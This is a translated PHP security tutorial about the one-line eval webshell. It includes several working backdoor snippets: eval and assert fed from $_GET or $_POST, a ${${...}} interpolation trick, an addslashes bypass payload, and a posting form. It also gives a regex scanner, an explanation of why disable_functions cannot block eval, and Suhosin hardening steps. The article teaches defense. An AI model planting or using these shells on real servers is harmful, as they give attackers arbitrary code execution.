
Some time ago, after the website was attacked, we learned that PHP's eval function carries serious security risks. This article introduces a way to disable eval; refer to it if you need it.

How to ban eval with security risks in php

Some time ago the website was broken into. During the follow-up investigation a PHP file was found with very little content:

<?php eval($_POST[asda123131323156341]);?>

Searching for PHP's eval function online then showed that it carries serious security risks.

To test this locally, write a PHP file in the local environment with the following content:

default.php:

<?php eval($_GET['asda']); ?>

Then visit: localhost/test/default.php?asda=phpinfo();

You can see that phpinfo has been executed.

Or visit localhost/test/default.php?asda=echo 11111; and you will see 11111 echoed back.

Similar methods include:

<?php
// The "${${...}}" variable-variable interpolation runs eval() while the string is being built.
$code = "${${eval($_GET['c'])}}";
?>

Visit localhost/test/default.php?c=phpinfo(); and the phpinfo() page is shown.

<?php
// addslashes() does not touch "$", "{" or "}", so a payload such as
// ${${phpinfo()}} survives and is interpolated, and therefore executed,
// when the double-quoted string is built inside eval().
$code = addslashes($_GET['c']);
eval("\"$code\";");
?>

Visit localhost/test/default.php?c=${${phpinfo()}}; and the phpinfo() page is shown.

Because eval executes whatever PHP it is handed, an attacker only needs to get a file like this onto the server (for example through an unrestricted upload) and can then send it arbitrary code via the URL or a POST body; that code runs with the web server's privileges, and from there the attacker can drop further backdoors or try to gain higher privileges. Because the whole backdoor fits in a single line, this kind of file is called a one-sentence Trojan (一句话木马). For example, write an HTML page with the following content:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

Then write a default.php with the content:

<?php eval($_POST['c']); ?>

Submitting the form sends the contents of the text box as c, and default.php executes it as PHP: whatever code is submitted simply runs.

So eval() is extremely destructive to PHP security: it weakens the whole application, and it is generally avoided precisely to prevent one-sentence Trojan intrusions like the one above. It needs to be banned!
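Finding such files is the first step in the cleanup. The scanner below is an added example written for this page, not code from the original article; it flags the execution sinks shown above (eval and assert fed straight from request superglobals, the ${${...}} interpolation trick, and eval of an interpolated string) in a directory tree, or, when run without arguments, in constructed copies of the snippets above. The superglobal list, the rule names and the file-extension filter are choices made here, and the script is written to run on PHP 5.4 and later.

```php
<?php
// Added example for this page (not from the original article): a triage
// scanner for one-sentence Trojan patterns. It is regex based, so treat its
// output as a starting point for manual review, not as proof either way.
// Usage: php webshell_scan.php /path/to/webroot
//        php webshell_scan.php              (scans the built-in samples)

// Request superglobals an attacker controls directly (assumed list).
const TAINTED = '\$_(?:GET|POST|REQUEST|COOKIE)\s*\[';

// Rule name => regex. The rule set covers this page's examples, nothing more.
function rules()
{
    return [
        'eval() of request data'   => '/\beval\s*\(\s*' . TAINTED . '/i',
        'assert() of request data' => '/\bassert\s*\(\s*' . TAINTED . '/i',
        '${${...}} variable-variable interpolation' => '/\$\{\s*\$\{/',
        // eval("...$var...") lets a request value reach the string being built.
        'eval() of an interpolated string' => '/\beval\s*\(\s*"(?:[^"\\\\]|\\\\.)*\$/',
        // eval($anything_else) cannot be judged by a regex: flag it for a human.
        'eval() of a variable (review manually)'
            => '/\beval\s*\(\s*\$(?!_(?:GET|POST|REQUEST|COOKIE)\b)[A-Za-z_]\w*/i',
    ];
}

// One finding per hit: file, 1-based line, rule name, matched text.
function scanSource($source, $file = '<inline>')
{
    $findings = [];
    foreach (rules() as $rule => $regex) {
        if (!preg_match_all($regex, $source, $m, PREG_OFFSET_CAPTURE)) {
            continue;
        }
        foreach ($m[0] as $hit) {
            list($match, $offset) = $hit;
            $line = substr_count(substr($source, 0, $offset), "\n") + 1;
            $findings[] = ['file' => $file, 'line' => $line, 'rule' => $rule, 'match' => $match];
        }
    }
    return $findings;
}

// Walks a directory tree and scans every file with a PHP-like extension.
function scanDirectory($dir)
{
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $info) {
        // Backdoors hide behind any extension the server hands to PHP.
        if (!preg_match('/\.(php|phtml|php[3457]|inc)$/i', $info->getFilename())) {
            continue;
        }
        $src = @file_get_contents($info->getPathname());
        if ($src !== false) {
            $findings = array_merge($findings, scanSource($src, $info->getPathname()));
        }
    }
    return $findings;
}

// Constructed samples (not real files): the snippets from this article plus a clean one.
$samples = [
    'found_on_server.php' => '<?php eval($_POST[asda123131323156341]);?>',
    'default_get.php'     => '<?php eval($_GET[\'asda\']); ?>',
    'interp.php'          => '<?php $code="${${eval($_GET[\'c\'])}}"; ?>',
    'assert.php'          => '<?php assert($_REQUEST["c"]); ?>',
    'clean.php'           => '<?php echo htmlspecialchars($_GET["name"]); ?>',
];
$samples['addslashes.php'] = <<<'PHP'
<?php
$code = addslashes($_GET['c']);
eval("\"$code\";");
?>
PHP;

if (isset($argv[1])) {
    $findings = scanDirectory($argv[1]);
} else {
    $findings = [];
    foreach ($samples as $name => $src) {
        $findings = array_merge($findings, scanSource($src, $name));
    }
}
foreach ($findings as $f) {
    printf("%s:%d  %s  [%s]\n", $f['file'], $f['line'], $f['rule'], $f['match']);
}
if (!$findings) {
    echo "no suspicious patterns found\n";
}
exit($findings ? 1 : 0);
```

On the built-in samples every file except clean.php is reported (interp.php twice, once for the eval of request data and once for the ${${...}} interpolation), and the exit status is 1 whenever something was flagged, so the script can be dropped into a cron job or a deploy check.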

However, many methods found online that claim to disable eval through disable_functions are wrong!

In fact, eval() cannot be disabled with disable_functions in php.ini, because eval() is a language construct, not a function. disable_functions works by removing entries from the engine's function table (the functions defined with PHP_FUNCTION), while eval is handled by the Zend engine itself and compiled directly into an opcode. There is no function-table entry to remove, so listing eval in disable_functions has no effect; function_exists('eval') returns false for the same reason.

So how can eval be prohibited in PHP?

If you want to disable eval, you can use the Suhosin PHP extension: after installing it, load suhosin.so in php.ini and add suhosin.executor.disable_eval = on.

Summary: eval cannot be disabled by PHP's own configuration, so the only option is an extension. Note that Suhosin 0.9.x is a PHP 5 extension and is not maintained for PHP 7 and later; on newer versions the realistic option is to keep eval() out of the code base and review for it.

The steps to install Suhosin and disable the eval function are as follows (not tested):

Instructions:

php installation directory:/usr/local/php5

php.ini configuration file path:/usr/local/php5/etc/php.ini

Nginx installation directory:/usr/local/nginx

Nginx website root directory: /usr/local/nginx/html

1. Install the compilation tools

yum install wget make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils patch perl

2. Install suhosin

cd /usr/local/src   # enter the directory where source packages are kept
wget http://download.suhosin.org/suhosin-0.9.33.tgz   # download
tar zxvf suhosin-0.9.33.tgz   # unpack
cd suhosin-0.9.33   # enter the source directory
/usr/local/php5/bin/phpize   # generate the configure script with phpize
./configure --with-php-config=/usr/local/php5/bin/php-config   # configure
make   # compile
make install   # install
After the installation completes, the following line is printed; note the path, it is needed in the next step.
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   # suhosin module path

3. Configure php to support suhosin

vi /usr/local/php5/etc/php.ini
 # edit the configuration file and add the following lines at the end
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

Note: suhosin.executor.disable_eval = on is the setting that disables the eval function.

4. Test

vi /usr/local/nginx/html/phpinfo.php   # create the test file

<?php
phpinfo();
?>

:wq!   # save and exit

service php-fpm restart   # restart php-fpm

service nginx restart   # restart nginx

Note: With Apache the steps are the same; just restart Apache instead of php-fpm and nginx.

Open phpinfo.php in your browser; the Suhosin section should now appear in the output.

At this point, the suhosin installation of PHP under Linux is completed!
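The phpinfo() page only shows that the extension was loaded. The check script below is an added example for this page, not part of the original article or of Suhosin. It makes the earlier point about disable_functions concrete (function_exists() never sees eval, so the directive cannot touch it, while real functions such as assert and system do disappear) and then probes eval() directly, which is the check worth running after step 4. Run it with the same PHP binary your site uses; the list of functions it reports on is a choice made here, and it is written to run on PHP 5.4 and later.

```php
<?php
// Added example for this page (not from the original article or Suhosin):
// report what php.ini really blocks, then probe eval() itself.
// Usage: php eval_check.php
//        php -d disable_functions=eval,assert,system eval_check.php
// The second form shows that listing eval in disable_functions changes nothing.

// Error types that terminate the script.
function isFatal($type)
{
    return in_array($type, [E_ERROR, E_CORE_ERROR, E_COMPILE_ERROR, E_PARSE], true);
}

// Names listed in disable_functions, trimmed and lower-cased.
function disabledFunctions()
{
    $raw = (string) ini_get('disable_functions');
    $names = array_map(function ($s) { return strtolower(trim($s)); }, explode(',', $raw));
    return array_values(array_filter($names));
}

// function_exists() returns false both for names PHP never had and for
// functions removed by disable_functions, so one check covers both cases.
function functionStatus(array $names)
{
    $status = [];
    foreach ($names as $fn) {
        $status[$fn] = function_exists($fn) ? 'callable' : 'disabled/absent';
    }
    return $status;
}

// If an extension blocks eval(), PHP dies with a fatal error before the last
// echo below runs; this shutdown hook reports that case instead.
register_shutdown_function(function () {
    $err = error_get_last();
    if ($err !== null && isFatal($err['type'])) {
        echo "eval() is BLOCKED: {$err['message']}\n";
    }
});

$disabled = disabledFunctions();
echo 'disable_functions = ' . ($disabled ? implode(',', $disabled) : '(empty)') . "\n";

// eval is a language construct: there is no function-table entry to remove.
echo "function_exists('eval'): " . var_export(function_exists('eval'), true) . "\n";
if (in_array('eval', $disabled, true)) {
    echo "  warning: 'eval' in disable_functions has no effect\n";
}

// Assumed list of functions worth checking on a hardened host.
$watch = ['assert', 'system', 'exec', 'shell_exec', 'passthru', 'create_function'];
foreach (functionStatus($watch) as $fn => $state) {
    printf("%-16s %s\n", $fn, $state);
}

if (extension_loaded('suhosin')) {
    $on = filter_var(ini_get('suhosin.executor.disable_eval'), FILTER_VALIDATE_BOOLEAN);
    echo 'suhosin loaded, executor.disable_eval = ' . ($on ? 'on' : 'off') . "\n";
} else {
    echo "suhosin not loaded\n";
}

// Probe last: on a host where eval is blocked, this line ends the script
// and the shutdown hook above prints the reason.
$answer = eval('return 6 * 7;');
echo "eval() still works (returned $answer)\n";
```

Run it through php-fpm as well as the CLI if the two use different php.ini files, since the web SAPI is the one the attacker reaches: a Suhosin block in the CLI ini proves nothing about the site.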

Note: what are the consequences of disabling eval? Any software whose code uses eval stops working: the well-known Discuz! and PHPWind forums will no longer run normally, and older versions of phpMyAdmin are affected as well. phpMyAdmin 3.2.5 (the latest version at the time of writing) works, but by default shows a warning about Suhosin; add $cfg['SuhosinDisableWarning'] = true; to config.inc.php to suppress that warning.

Note: besides eval, assert is abused in the same way: assert($_POST['c']) evaluates a string argument as code in PHP 5 and 7 (string evaluation was removed in PHP 8.0). Unlike eval, assert is a real function, so it can be listed in disable_functions.


Statement
This article is reproduced from CSDN. If there is any infringement, please contact admin@php.cn for deletion.